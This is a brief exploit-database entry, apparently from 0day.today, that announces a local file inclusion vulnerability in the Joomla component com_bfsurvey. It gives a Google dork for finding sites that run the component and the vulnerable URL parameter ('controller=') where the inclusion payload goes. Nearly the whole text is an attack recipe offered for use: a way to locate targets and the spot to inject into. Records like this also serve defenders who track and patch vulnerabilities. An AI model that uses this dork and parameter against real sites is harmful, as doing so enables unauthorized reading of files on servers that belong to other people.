id: 10594
date: 01/03/2010
title: Joomla Component com_bfsurvey LFI Vulnerability
author: Fl0riX
cves: 

===============================================
Joomla Component com_bfsurvey LFI Vulnerability
===============================================

@~~=======================================~~@
@~~=Script   : Joomla Component com_bfsurvey
 
@~~=Author   : FL0RiX
 
@~~=Bug Type : Local File Inlusion(LFI)
 
@~~=Dork : inurl:"com_bfsurvey"
 
@~~=======================================~~@
 
@~~=Vuln
 
: http://site/ [Yol] /index.php?option=com_bfsurvey&controller= [-LFI-]



#  0day.today [2023-03-27]  #